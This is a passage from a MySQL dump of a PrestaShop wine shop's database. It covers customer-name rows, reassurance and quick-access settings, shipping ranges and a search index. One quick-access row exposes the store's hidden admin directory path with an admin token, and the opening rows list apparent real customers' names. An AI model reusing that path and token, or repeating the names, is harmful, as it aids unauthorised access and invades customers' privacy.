(19, 84, 0, 'Gabriel Jacinto ', 0, 1, '2021-10-14 16:24:07', '2021-10-14 16:24:07'),
(20, 87, 0, 'Andre Martins Andre Martins', 0, 1, '2022-01-09 18:06:48', '2022-01-09 18:06:48'),
(21, 88, 0, 'Marilia gomessss', 0, 1, '2022-01-23 03:18:20', '2022-01-23 03:18:20'),
(22, 91, 0, 'André Ramos', 0, 1, '2022-03-16 15:48:21', '2022-03-16 15:48:21'),
(23, 93, 0, 'Francisco Carlos Da Fonseca Costa', 0, 1, '2022-05-14 02:13:08', '2022-05-14 02:13:08'),
(24, 102, 0, 'Daniel Meyer', 0, 1, '2022-06-20 19:54:12', '2022-06-20 19:54:12'),
(25, 103, 0, 'Luis Figueira', 0, 1, '2022-06-21 13:26:10', '2022-06-21 13:26:10'),
(26, 104, 0, 'Yekaterina Korotayeva', 0, 1, '2022-09-18 13:50:00', '2022-09-18 13:50:00'),
(27, 108, 0, 'Ira Lippke', 0, 1, '2022-12-16 15:57:16', '2022-12-16 15:57:16'),
(28, 109, 0, 'Justin Cartwright', 0, 1, '2023-02-28 20:17:58', '2023-02-28 20:17:58'),
(29, 110, 0, 'Dina Janeiro', 0, 1, '2023-08-03 12:04:05', '2023-08-03 12:04:05'),
(30, 111, 0, 'Oli Weise', 0, 1, '2023-08-16 10:54:47', '2023-08-16 10:54:47'),
(31, 112, 0, 'Christopher  Li', 0, 1, '2023-09-08 08:09:09', '2023-09-08 08:09:09'),
(32, 113, 0, 'Teste Testndo', 0, 1, '2023-09-11 22:35:32', '2023-09-11 22:35:32'),
(33, 114, 0, 'Francisca Batalha Reis', 0, 1, '2023-10-04 13:05:48', '2023-10-04 13:05:48'),
(34, 122, 0, 'Vitor Monteiro', 0, 1, '2023-11-07 19:28:04', '2023-11-07 19:28:04'),
(35, 123, 0, 'Natália Augusto', 0, 1, '2023-11-08 15:55:08', '2023-11-08 15:55:08'),
(36, 131, 0, 'Nuno Fentelhas', 0, 1, '2023-11-27 09:30:53', '2023-11-27 09:30:53'),
(37, 148, 0, 'retert treter', 0, 1, '2024-01-09 10:04:55', '2024-01-09 10:04:55'),
(38, 60, 0, 'luis portugal', 0, 2, '2024-02-12 20:01:54', '2024-02-12 20:01:54'),
(39, 60, 0, 'luis portugal', 0, 3, '2024-02-12 20:03:09', '2024-02-12 20:03:09'),
(40, 154, 0, 'Francisca Reis', 0, 1, '2024-02-18 20:27:49', '2024-02-18 20:27:49'),
(41, 162, 0, 'Manuel Gavina', 0, 1, '2024-03-10 12:16:49', '2024-03-10 12:16:49'),
(42, 163, 0, 'Luis Correia', 0, 1, '2024-03-28 20:46:41', '2024-03-28 20:46:41'),
(43, 176, 0, 'Rodrigo Quina', 0, 1, '2024-07-30 09:36:04', '2024-07-30 09:36:04'),
(44, 177, 0, 'test test', 0, 1, '2024-09-04 14:36:04', '2024-09-04 14:36:04'),
(45, 178, 0, 'Carla Freitas', 0, 1, '2024-10-25 19:55:52', '2024-10-25 19:55:52'),
(46, 179, 0, 'Carina Barbosa', 0, 1, '2024-11-20 18:44:22', '2024-11-20 18:44:22');

-- --------------------------------------------------------

--
-- Table structure for table `ps_psreassurance`
--

CREATE TABLE `ps_psreassurance` (
  `id_psreassurance` int(10) UNSIGNED NOT NULL,
  `icon` varchar(255) DEFAULT NULL,
  `custom_icon` varchar(255) DEFAULT NULL,
  `status` int(10) UNSIGNED NOT NULL,
  `position` int(10) UNSIGNED NOT NULL,
  `id_shop` int(10) UNSIGNED NOT NULL,
  `type_link` int(10) UNSIGNED DEFAULT NULL,
  `id_cms` int(10) UNSIGNED DEFAULT NULL,
  `date_add` datetime NOT NULL,
  `date_upd` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_psreassurance`
--

INSERT INTO `ps_psreassurance` (`id_psreassurance`, `icon`, `custom_icon`, `status`, `position`, `id_shop`, `type_link`, `id_cms`, `date_add`, `date_upd`) VALUES
(1, '/Store/modules/blockreassurance/img/ic_verified_user_black_36dp_1x.png', '', 0, 1, 1, 2, 1, '2021-08-24 10:08:09', '2021-08-24 10:14:25'),
(2, '/Store/modules/blockreassurance/img/ic_local_shipping_black_36dp_1x.png', '', 1, 2, 1, 2, 0, '2021-08-24 10:14:11', '2021-08-24 10:14:11'),
(3, '/Store/modules/blockreassurance/img/ic_swap_horiz_black_36dp_1x.png', '', 0, 3, 1, 2, 0, '2020-12-11 09:31:04', '2020-12-19 18:58:10');

-- --------------------------------------------------------

--
-- Table structure for table `ps_psreassurance_lang`
--

CREATE TABLE `ps_psreassurance_lang` (
  `id_psreassurance` int(10) UNSIGNED NOT NULL,
  `id_lang` int(10) UNSIGNED NOT NULL,
  `id_shop` int(10) UNSIGNED NOT NULL,
  `title` varchar(255) NOT NULL,
  `description` varchar(255) NOT NULL,
  `link` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_psreassurance_lang`
--

INSERT INTO `ps_psreassurance_lang` (`id_psreassurance`, `id_lang`, `id_shop`, `title`, `description`, `link`) VALUES
(1, 1, 1, 'Política de segurança', '', 'https://vinhodetalha.com/Store/pt/content/1-entrega-e-devolucoes'),
(1, 2, 1, 'Política de segurança ', '', 'https://vinhodetalha.com/Store/en/content/1-shipping-returns'),
(2, 1, 1, 'Política de entrega', '', 'http://vinhodetalha.com/Store/pt/content/1-entrega-e-devolucoes'),
(2, 2, 1, 'Política de entrega', '', ''),
(3, 1, 1, 'Política de devolução ', '', ''),
(3, 2, 1, 'Política de devolução ', '', 'http://vinhodetalha.com/Store/pt/content/1-entrega-e-devolucoes');

-- --------------------------------------------------------

--
-- Table structure for table `ps_quick_access`
--

CREATE TABLE `ps_quick_access` (
  `id_quick_access` int(10) UNSIGNED NOT NULL,
  `new_window` tinyint(1) NOT NULL DEFAULT '0',
  `link` varchar(255) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_quick_access`
--

INSERT INTO `ps_quick_access` (`id_quick_access`, `new_window`, `link`) VALUES
(1, 0, 'index.php?controller=AdminOrders'),
(2, 0, 'index.php?controller=AdminCartRules&addcart_rule'),
(3, 0, 'index.php/sell/catalog/products/new'),
(4, 0, 'index.php/sell/catalog/categories/new'),
(5, 0, 'index.php/improve/modules/manage'),
(6, 0, 'index.php?controller=AdminStats&module=statscheckup'),
(7, 0, 'http://vinhodetalha.com/Store/admin814sozb1p/index.php?controller=AdminModules&token=3d24bc60e58616528b1ddc291ae12361&configure=smartblog'),
(8, 0, 'index.php/improve/design/themes/?-_rsg');

-- --------------------------------------------------------

--
-- Table structure for table `ps_quick_access_lang`
--

CREATE TABLE `ps_quick_access_lang` (
  `id_quick_access` int(10) UNSIGNED NOT NULL,
  `id_lang` int(10) UNSIGNED NOT NULL,
  `name` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_quick_access_lang`
--

INSERT INTO `ps_quick_access_lang` (`id_quick_access`, `id_lang`, `name`) VALUES
(1, 1, 'Encomendas'),
(1, 2, 'Orders'),
(2, 1, 'Novo Voucher'),
(2, 2, 'New voucher'),
(3, 1, 'Novo produto'),
(3, 2, 'New product'),
(4, 1, 'Nova Categoria'),
(4, 2, 'New category'),
(5, 1, 'Módulos instalados'),
(5, 2, 'Installed modules'),
(6, 1, 'Avaliação do catálogo'),
(6, 2, 'Catalog evaluation'),
(7, 1, 'Smart Blog Setting'),
(7, 2, 'Smart Blog Setting'),
(8, 1, 'Tema Gráfico e...'),
(8, 2, 'Tema Gráfico e...');

-- --------------------------------------------------------

--
-- Table structure for table `ps_range_price`
--

CREATE TABLE `ps_range_price` (
  `id_range_price` int(10) UNSIGNED NOT NULL,
  `id_carrier` int(10) UNSIGNED NOT NULL,
  `delimiter1` decimal(20,6) NOT NULL,
  `delimiter2` decimal(20,6) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_range_price`
--

INSERT INTO `ps_range_price` (`id_range_price`, `id_carrier`, `delimiter1`, `delimiter2`) VALUES
(1, 2, 0.000000, 10000.000000);

-- --------------------------------------------------------

--
-- Table structure for table `ps_range_weight`
--

CREATE TABLE `ps_range_weight` (
  `id_range_weight` int(10) UNSIGNED NOT NULL,
  `id_carrier` int(10) UNSIGNED NOT NULL,
  `delimiter1` decimal(20,6) NOT NULL,
  `delimiter2` decimal(20,6) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_range_weight`
--

INSERT INTO `ps_range_weight` (`id_range_weight`, `id_carrier`, `delimiter1`, `delimiter2`) VALUES
(1, 2, 0.000000, 10000.000000),
(2, 4, 0.000000, 2.000000),
(3, 4, 2.000000, 5.000000),
(4, 4, 5.000000, 10.000000),
(5, 4, 10.000000, 15.000000),
(6, 4, 15.000000, 20.000000),
(7, 4, 20.000000, 25.000000),
(8, 4, 25.000000, 30.000000),
(9, 5, 0.000000, 2.000000),
(10, 5, 2.000000, 5.000000),
(11, 5, 5.000000, 10.000000),
(12, 5, 10.000000, 15.000000),
(13, 5, 15.000000, 20.000000),
(14, 5, 20.000000, 25.000000),
(15, 5, 25.000000, 30.000000),
(16, 6, 0.000000, 2.000000),
(17, 6, 2.000000, 5.000000),
(18, 6, 5.000000, 10.000000),
(19, 6, 10.000000, 15.000000),
(20, 6, 15.000000, 20.000000),
(21, 6, 20.000000, 25.000000),
(22, 6, 25.000000, 30.000000),
(23, 7, 0.000000, 1.000000),
(24, 7, 1.000000, 2.000000),
(25, 7, 2.000000, 3.000000),
(26, 7, 3.000000, 4.000000),
(27, 7, 4.000000, 5.000000),
(28, 7, 5.000000, 6.000000),
(29, 7, 6.000000, 7.000000),
(30, 7, 7.000000, 8.000000),
(31, 7, 8.000000, 10.000000),
(32, 7, 10.000000, 11.000000),
(33, 7, 11.000000, 12.000000),
(34, 7, 12.000000, 13.000000),
(35, 7, 13.000000, 14.000000),
(36, 7, 14.000000, 15.000000),
(37, 7, 15.000000, 16.000000),
(38, 7, 16.000000, 17.000000),
(39, 7, 17.000000, 18.000000),
(40, 7, 18.000000, 19.000000),
(41, 7, 19.000000, 20.000000),
(42, 7, 20.000000, 21.000000),
(43, 7, 21.000000, 22.000000),
(44, 7, 22.000000, 23.000000),
(45, 7, 23.000000, 24.000000),
(46, 7, 24.000000, 25.000000),
(47, 7, 25.000000, 26.000000),
(48, 7, 26.000000, 27.000000),
(49, 7, 27.000000, 28.000000),
(50, 7, 28.000000, 29.000000),
(51, 7, 29.000000, 30.000000),
(52, 7, 30.000000, 0.000000);

-- --------------------------------------------------------

--
-- Table structure for table `ps_reassurance`
--

CREATE TABLE `ps_reassurance` (
  `id_reassurance` int(10) UNSIGNED NOT NULL,
  `id_shop` int(10) UNSIGNED NOT NULL,
  `file_name` varchar(100) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_reassurance`
--

INSERT INTO `ps_reassurance` (`id_reassurance`, `id_shop`, `file_name`) VALUES
(1, 1, 'ic_verified_user_black_36dp_1x.png'),
(2, 1, 'ic_local_shipping_black_36dp_1x.png'),
(3, 1, 'ic_swap_horiz_black_36dp_1x.png');

-- --------------------------------------------------------

--
-- Table structure for table `ps_reassurance_lang`
--

CREATE TABLE `ps_reassurance_lang` (
  `id_reassurance` int(10) UNSIGNED NOT NULL,
  `id_lang` int(10) UNSIGNED NOT NULL,
  `text` varchar(300) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_reassurance_lang`
--

INSERT INTO `ps_reassurance_lang` (`id_reassurance`, `id_lang`, `text`) VALUES
(1, 1, 'Política de segurança (editar com o módulo Garantia do cliente)'),
(1, 2, 'Política de segurança (editar com o módulo Garantia do cliente)'),
(2, 1, 'Política de entrega (editar com o módulo Garantia do cliente)'),
(2, 2, 'Política de entrega (editar com o módulo Garantia do cliente)'),
(3, 1, 'Política de devolução (editar com o módulo Garantia do cliente)'),
(3, 2, 'Política de devolução (editar com o módulo Garantia do cliente)');

-- --------------------------------------------------------

--
-- Table structure for table `ps_referrer`
--

CREATE TABLE `ps_referrer` (
  `id_referrer` int(10) UNSIGNED NOT NULL,
  `name` varchar(64) NOT NULL,
  `passwd` varchar(255) DEFAULT NULL,
  `http_referer_regexp` varchar(64) DEFAULT NULL,
  `http_referer_like` varchar(64) DEFAULT NULL,
  `request_uri_regexp` varchar(64) DEFAULT NULL,
  `request_uri_like` varchar(64) DEFAULT NULL,
  `http_referer_regexp_not` varchar(64) DEFAULT NULL,
  `http_referer_like_not` varchar(64) DEFAULT NULL,
  `request_uri_regexp_not` varchar(64) DEFAULT NULL,
  `request_uri_like_not` varchar(64) DEFAULT NULL,
  `base_fee` decimal(5,2) NOT NULL DEFAULT '0.00',
  `percent_fee` decimal(5,2) NOT NULL DEFAULT '0.00',
  `click_fee` decimal(5,2) NOT NULL DEFAULT '0.00',
  `date_add` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_referrer_cache`
--

CREATE TABLE `ps_referrer_cache` (
  `id_connections_source` int(11) UNSIGNED NOT NULL,
  `id_referrer` int(11) UNSIGNED NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_referrer_shop`
--

CREATE TABLE `ps_referrer_shop` (
  `id_referrer` int(10) UNSIGNED NOT NULL,
  `id_shop` int(10) UNSIGNED NOT NULL DEFAULT '1',
  `cache_visitors` int(11) DEFAULT NULL,
  `cache_visits` int(11) DEFAULT NULL,
  `cache_pages` int(11) DEFAULT NULL,
  `cache_registrations` int(11) DEFAULT NULL,
  `cache_orders` int(11) DEFAULT NULL,
  `cache_sales` decimal(17,2) DEFAULT NULL,
  `cache_reg_rate` decimal(5,4) DEFAULT NULL,
  `cache_order_rate` decimal(5,4) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_request_sql`
--

CREATE TABLE `ps_request_sql` (
  `id_request_sql` int(11) NOT NULL,
  `name` varchar(200) NOT NULL,
  `sql` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `ps_required_field`
--

CREATE TABLE `ps_required_field` (
  `id_required_field` int(11) NOT NULL,
  `object_name` varchar(32) NOT NULL,
  `field_name` varchar(32) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_required_field`
--

INSERT INTO `ps_required_field` (`id_required_field`, `object_name`, `field_name`) VALUES
(4, 'CustomerAddress', 'phone');

-- --------------------------------------------------------

--
-- Table structure for table `ps_risk`
--

CREATE TABLE `ps_risk` (
  `id_risk` int(11) UNSIGNED NOT NULL,
  `percent` tinyint(3) NOT NULL,
  `color` varchar(32) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_risk`
--

INSERT INTO `ps_risk` (`id_risk`, `percent`, `color`) VALUES
(1, 0, '#32CD32'),
(2, 35, '#FF8C00'),
(3, 75, '#DC143C'),
(4, 100, '#ec2e15');

-- --------------------------------------------------------

--
-- Table structure for table `ps_risk_lang`
--

CREATE TABLE `ps_risk_lang` (
  `id_risk` int(10) UNSIGNED NOT NULL,
  `id_lang` int(10) UNSIGNED NOT NULL,
  `name` varchar(20) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_risk_lang`
--

INSERT INTO `ps_risk_lang` (`id_risk`, `id_lang`, `name`) VALUES
(1, 1, 'Nenhum'),
(1, 2, 'None'),
(2, 1, 'Baixa'),
(2, 2, 'Low'),
(3, 1, 'Médio'),
(3, 2, 'Medium'),
(4, 1, 'Alto'),
(4, 2, 'High');

-- --------------------------------------------------------

--
-- Table structure for table `ps_search_engine`
--

CREATE TABLE `ps_search_engine` (
  `id_search_engine` int(10) UNSIGNED NOT NULL,
  `server` varchar(64) NOT NULL,
  `getvar` varchar(16) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_search_engine`
--

INSERT INTO `ps_search_engine` (`id_search_engine`, `server`, `getvar`) VALUES
(1, 'google', 'q'),
(2, 'aol', 'q'),
(3, 'yandex', 'text'),
(4, 'ask.com', 'q'),
(5, 'nhl.com', 'q'),
(6, 'yahoo', 'p'),
(7, 'baidu', 'wd'),
(8, 'lycos', 'query'),
(9, 'exalead', 'q'),
(10, 'search.live', 'q'),
(11, 'voila', 'rdata'),
(12, 'altavista', 'q'),
(13, 'bing', 'q'),
(14, 'daum', 'q'),
(15, 'eniro', 'search_word'),
(16, 'naver', 'query'),
(17, 'msn', 'q'),
(18, 'netscape', 'query'),
(19, 'cnn', 'query'),
(20, 'about', 'terms'),
(21, 'mamma', 'query'),
(22, 'alltheweb', 'q'),
(23, 'virgilio', 'qs'),
(24, 'alice', 'qs'),
(25, 'najdi', 'q'),
(26, 'mama', 'query'),
(27, 'seznam', 'q'),
(28, 'onet', 'qt'),
(29, 'szukacz', 'q'),
(30, 'yam', 'k'),
(31, 'pchome', 'q'),
(32, 'kvasir', 'q'),
(33, 'sesam', 'q'),
(34, 'ozu', 'q'),
(35, 'terra', 'query'),
(36, 'mynet', 'q'),
(37, 'ekolay', 'q'),
(38, 'rambler', 'words');

-- --------------------------------------------------------

--
-- Table structure for table `ps_search_index`
--

CREATE TABLE `ps_search_index` (
  `id_product` int(11) UNSIGNED NOT NULL,
  `id_word` int(11) UNSIGNED NOT NULL,
  `weight` smallint(4) UNSIGNED NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Dumping data for table `ps_search_index`
--

INSERT INTO `ps_search_index` (`id_product`, `id_word`, `weight`) VALUES
(22, 776, 1),
(22, 777, 1),
(22, 778, 1),
(22, 779, 1),
(22, 780, 1),
(22, 781, 1),
(22, 782, 1),
(22, 783, 1),
(22, 784, 1),
(22, 785, 1),
(22, 786, 1),
(22, 787, 1),
(22, 788, 1),
(22, 789, 1),
(22, 790, 1),
(22, 791, 1),
(22, 792, 1),
(22, 793, 1),
(22, 794, 1),
(22, 796, 1),
(22, 798, 1),
(22, 799, 1),
(22, 800, 1),
(22, 801, 1),
(22, 802, 1),
(22, 803, 1),
(22, 804, 1),
(22, 805, 1),
(22, 806, 1),
(22, 807, 1),
(22, 808, 1),
(22, 809, 1),
(22, 810, 1),
(22, 811, 1),
(22, 812, 1),
(22, 813, 1),
(22, 814, 1),
(22, 1032, 1),
(22, 1300, 1),
(22, 1301, 1),
(22, 1381, 1),
(22, 1890, 1),
(22, 2298, 1),
(22, 2306, 1),
(22, 2569, 1),
(22, 2948, 1),
(22, 3550, 1),
(22, 3551, 1),
(22, 3552, 1),
(22, 3553, 1),
(22, 3554, 1),
(22, 3555, 1),
(22, 3556, 1),
(22, 3557, 1),
(22, 3558, 1),
(22, 3559, 1),
(22, 3560, 1),
(22, 3561, 1),
(22, 3562, 1),
(22, 3563, 1),
(22, 3564, 1),
(22, 3566, 1),
(22, 3567, 1),
(22, 3568, 1),
(22, 3569, 1),
(22, 3570, 1),
(22, 3571, 1),
(22, 3572, 1),
(22, 3573, 1),
(22, 3574, 1),
(22, 3575, 1),
(22, 4027, 1),
(22, 4043, 1),
(22, 8999, 1),
(22, 9000, 1),
(22, 9001, 1),
(22, 9002, 1),
(22, 9003, 1),
(22, 9004, 1),
(22, 9005, 1),
(22, 9007, 1),
(22, 9008, 1),
(22, 14220, 1),
(22, 14230, 1),
(22, 16407, 1),
(22, 16408, 1),
(22, 16409, 1),
(22, 16410, 1),
(22, 16411, 1),
(22, 16412, 1),
(22, 16413, 1),
(22, 16416, 1),
(22, 16417, 1),
(22, 16419, 1),
(22, 16420, 1),
(22, 16421, 1),
(22, 16960, 1),
(22, 797, 2),
(22, 816, 2),
(22, 817, 2),
(22, 818, 2),
(22, 819, 2),
(22, 820, 2),
(22, 821, 2),
(22, 822, 2),
(22, 823, 2),
(22, 824, 2),
(22, 825, 2),
(22, 826, 2),
(22, 827, 2),
(22, 828, 2),
(22, 829, 2),
(22, 3565, 2),
(22, 3577, 2),
(22, 3579, 2),
(22, 3580, 2),
(22, 3581, 2),
(22, 3582, 2),
(22, 3583, 2),
(22, 3585, 2),
(22, 3586, 2),
(22, 3587, 2),
(22, 3588, 2),
(22, 3589, 2),
(22, 795, 3),
(22, 830, 3),
(22, 3578, 3),
(22, 3584, 3),
(22, 3590, 3),
(22, 772, 6),
(22, 774, 6),
(22, 775, 6),
(22, 3546, 6),
(22, 3547, 6),
(22, 3549, 6),
(22, 771, 7),
(22, 3545, 7),
(22, 773, 9),
(22, 3548, 9),
(23, 778, 1),
(23, 787, 1),
(23, 788, 1),
(23, 791, 1),
(23, 797, 1),
(23, 805, 1),
(23, 1014, 1),
(23, 1015, 1),
(23, 1016, 1),
(23, 1017, 1),
(23, 1018, 1),
(23, 1019, 1),
(23, 1020, 1),
(23, 1021, 1),
(23, 1022, 1),
(23, 1023, 1),
(23, 1024, 1),
(23, 1025, 1),
(23, 1026, 1),
(23, 1027, 1),
(23, 1028, 1),
(23, 1029, 1),
(23, 1030, 1),
(23, 1031, 1),
(23, 1033, 1),
(23, 1034, 1),
(23, 1038, 1),
(23, 1039, 1),
(23, 1040, 1),
(23, 1041, 1),
(23, 1042, 1),
(23, 1043, 1),
(23, 1044, 1),
(23, 1045, 1),
(23, 1046, 1),
(23, 1381, 1),
(23, 1890, 1),
(23, 2298, 1),
(23, 2306, 1),
(23, 2569, 1),
(23, 2948, 1),
(23, 3556, 1),
(23, 3557, 1),
(23, 3565, 1),
(23, 5237, 1),
(23, 6427, 1),
(23, 6431, 1),
(23, 6562, 1),
(23, 8999, 1),
(23, 9000, 1),
(23, 9001, 1),
(23, 9003, 1),
(23, 9004, 1),
(23, 9005, 1),
(23, 9007, 1),
(23, 9008, 1),
(23, 9892, 1),
(23, 14230, 1),
(23, 14693, 1),
(23, 14694, 1),
(23, 14695, 1),
(23, 14696, 1),
(23, 14697, 1),
(23, 14698, 1),
(23, 14699, 1),
(23, 14700, 1),
(23, 14701, 1),
(23, 14702, 1),
(23, 14703, 1),
(23, 14704, 1),
(23, 14705, 1),
(23, 14706, 1),
(23, 14708, 1),
(23, 14709, 1),
(23, 14710, 1),
(23, 16407, 1),
(23, 16408, 1),
(23, 16409, 1),
(23, 16410, 1),
(23, 16411, 1),
(23, 16412, 1),
(23, 16413, 1),
(23, 16416, 1),
(23, 16417, 1),
(23, 16419, 1),
(23, 16420, 1),
(23, 16421, 1),
(23, 17873, 1),
(23, 816, 2),
(23, 817, 2),
(23, 818, 2),
(23, 819, 2),
(23, 820, 2),
(23, 821, 2),
(23, 822, 2),
(23, 823, 2),
(23, 825, 2),
(23, 826, 2),
(23, 827, 2),
(23, 828, 2),
(23, 829, 2),
(23, 1032, 2),
(23, 1035, 2),
(23, 1036, 2),
(23, 1037, 2),
(23, 1047, 2),
(23, 1747, 2),
(23, 3577, 2),
(23, 3579, 2),
(23, 3580, 2),
(23, 3582, 2),
(23, 3587, 2),
(23, 3589, 2),
(23, 4475, 2),
(23, 4476, 2),
(23, 4477, 2),
(23, 6680, 2),
(23, 10223, 2),
(23, 10224, 2),
(23, 10225, 2),
(23, 10226, 2),
(23, 10227, 2),
(23, 10228, 2),
(23, 14220, 2),
(23, 795, 3),
(23, 830, 3),
(23, 3578, 3),
(23, 3584, 3),
(23, 3590, 3),
(23, 772, 6),
(23, 1013, 6),
(23, 3546, 6),
(23, 5229, 6),
(23, 1011, 7),
(23, 1012, 7),
(23, 6419, 7),
(23, 14707, 7),
(23, 773, 8),
(23, 3548, 8),
(24, 791, 1),
(24, 804, 1),
(24, 1011, 1),
(24, 1017, 1),
(24, 1019, 1),
(24, 1020, 1),
(24, 1022, 1),
(24, 1029, 1),
(24, 1031, 1),
(24, 1038, 1),
(24, 1041, 1),
(24, 1381, 1),
(24, 1873, 1),
(24, 1874, 1),
(24, 1875, 1),
(24, 1876, 1),
(24, 1877, 1),
(24, 1878, 1),
(24, 1879, 1),
(24, 1882, 1),
(24, 1883, 1),
(24, 1884, 1),
(24, 1885, 1),
(24, 1886, 1),
(24, 1887, 1),
(24, 1888, 1),
(24, 1889, 1),
(24, 1891, 1),
(24, 1892, 1),
(24, 2298, 1),
(24, 2306, 1),
(24, 2569, 1),
(24, 2948, 1),
(24, 3555, 1),
(24, 3565, 1),
(24, 3571, 1),
(24, 6562, 1),
(24, 8999, 1),
(24, 9000, 1),
(24, 9001, 1),
(24, 9003, 1),
(24, 9004, 1),
(24, 9005, 1),
(24, 9007, 1),
(24, 9008, 1),
(24, 10026, 1),
(24, 14230, 1),
(24, 14696, 1),
(24, 14697, 1),
(24, 14698, 1),
(24, 14701, 1),
(24, 14815, 1),
(24, 14816, 1),
(24, 14817, 1),
(24, 14818, 1),
(24, 14819, 1),
(24, 14820, 1),
(24, 14821, 1),
(24, 14822, 1),
(24, 14823, 1),
(24, 14824, 1),
(24, 14825, 1),
(24, 14826, 1),
(24, 14827, 1),
(24, 14828, 1),
(24, 14829, 1),
(24, 14830, 1),
(24, 16407, 1),
(24, 16408, 1),
(24, 16409, 1),
(24, 16410, 1),
(24, 16411, 1),
(24, 16412, 1),
(24, 16413, 1),
(24, 16415, 1),
(24, 16416, 1),
(24, 16417, 1),
(24, 16419, 1),
(24, 16420, 1),
(24, 16421, 1),
(24, 17731, 1),
(24, 797, 2),
(24, 816, 2),
(24, 817, 2),
(24, 818, 2),
(24, 819, 2),
(24, 820, 2),
(24, 821, 2),
(24, 822, 2),
(24, 823, 2),
(24, 825, 2),
(24, 826, 2),
(24, 827, 2),
(24, 828, 2),
(24, 829, 2),
(24, 1032, 2),
(24, 1035, 2),
(24, 1036, 2),
(24, 1037, 2),
(24, 1047, 2),
(24, 1747, 2),
(24, 1880, 2),
(24, 1881, 2),
(24, 1890, 2),
(24, 3577, 2),
(24, 3579, 2),
(24, 3580, 2),
(24, 3582, 2),
(24, 3584, 2),
(24, 3587, 2),
(24, 3589, 2),
(24, 4475, 2),
(24, 4476, 2),
(24, 4477, 2),
(24, 6557, 2),
(24, 6558, 2),
(24, 6680, 2),
(24, 10223, 2),
(24, 10224, 2),
(24, 10225, 2),
(24, 10226, 2),
(24, 10227, 2),
(24, 10228, 2),
(24, 14220, 2),
(24, 795, 3),
(24, 830, 3),
(24, 3578, 3),
(24, 3590, 3),
(24, 772, 6),
(24, 775, 6),
(24, 1871, 6),
(24, 3546, 6),
(24, 3549, 6),
(24, 6550, 6),
(24, 1012, 7),
(24, 14707, 7),
(24, 773, 8),
(24, 3548, 9),
(25, 772, 1),
(25, 778, 1),
(25, 793, 1),
(25, 797, 1),
(25, 802, 1),
(25, 803, 1),
(25, 804, 1),
(25, 1015, 1),
(25, 1029, 1),
(25, 1030, 1),
(25, 1031, 1),
(25, 1033, 1),
(25, 1034, 1),
(25, 1039, 1),
(25, 1049, 1),
(25, 1305, 1),
(25, 1373, 1),
(25, 1382, 1),
(25, 1383, 1),
(25, 1384, 1),
(25, 1385, 1),
(25, 1386, 1),
(25, 1387, 1),
(25, 1388, 1),
(25, 1389, 1),
(25, 1390, 1),
(25, 1391, 1),
(25, 1396, 1),
(25, 1746, 1),
(25, 1885, 1),
(25, 1890, 1),
(25, 2298, 1),
(25, 2306, 1),
(25, 2569, 1),
(25, 2948, 1),
(25, 3555, 1),
(25, 3557, 1),
(25, 3565, 1),
(25, 3571, 1),
(25, 6562, 1),
(25, 8999, 1),
(25, 9000, 1),
(25, 9001, 1),
(25, 9003, 1),
(25, 9004, 1),
(25, 9005, 1),
(25, 9007, 1),
(25, 9008, 1),
(25, 14230, 1),
(25, 14701, 1),
(25, 14702, 1),
(25, 14707, 1),
(25, 14817, 1),
(25, 14825, 1),
(25, 14935, 1),
(25, 14936, 1),
(25, 14937, 1),
(25, 14938, 1),
(25, 14939, 1),
(25, 14940, 1),
(25, 14941, 1),
(25, 14942, 1),
(25, 16407, 1),
(25, 16408, 1),
(25, 16409, 1),
(25, 16410, 1),
(25, 16411, 1),
(25, 16412, 1),
(25, 16413, 1),
(25, 16416, 1),
(25, 16417, 1),
(25, 16419, 1),
(25, 16420, 1),
(25, 16421, 1),
(25, 17458, 1),
(25, 61356, 1),
(25, 61357, 1),
(25, 61358, 1),
(25, 61359, 1),
(25, 61360, 1),
(25, 61361, 1),
(25, 61362, 1),
(25, 61363, 1),
(25, 61364, 1),
(25, 61365, 1),
(25, 61366, 1),
(25, 61367, 1),
(25, 61633, 1),
(25, 791, 2),
(25, 795, 2),
(25, 816, 2),
(25, 817, 2),
(25, 818, 2),
(25, 819, 2),
(25, 820, 2),
(25, 821, 2),
(25, 822, 2),
(25, 825, 2),
(25, 826, 2),
(25, 827, 2),
(25, 828, 2),
(25, 829, 2),
(25, 1032, 2),
(25, 1035, 2),
(25, 1036, 2),
(25, 1037, 2),
(25, 1047, 2),
(25, 1381, 2),
(25, 1747, 2),
(25, 3577, 2),
(25, 3579, 2),
(25, 3580, 2),
(25, 3582, 2),
(25, 3587, 2),
(25, 3589, 2),
(25, 4475, 2),
(25, 4476, 2),
(25, 4477, 2),
(25, 6680, 2),
(25, 10223, 2),
(25, 10224, 2),
(25, 10225, 2),
(25, 10226, 2),
(25, 10227, 2),
(25, 10228, 2),
(25, 14220, 2),
(25, 823, 3),
(25, 830, 3),
(25, 3548, 3),
(25, 3578, 3),
(25, 3584, 3),
(25, 3590, 3),
(25, 773, 4),
(25, 1013, 6),
(25, 5229, 6),
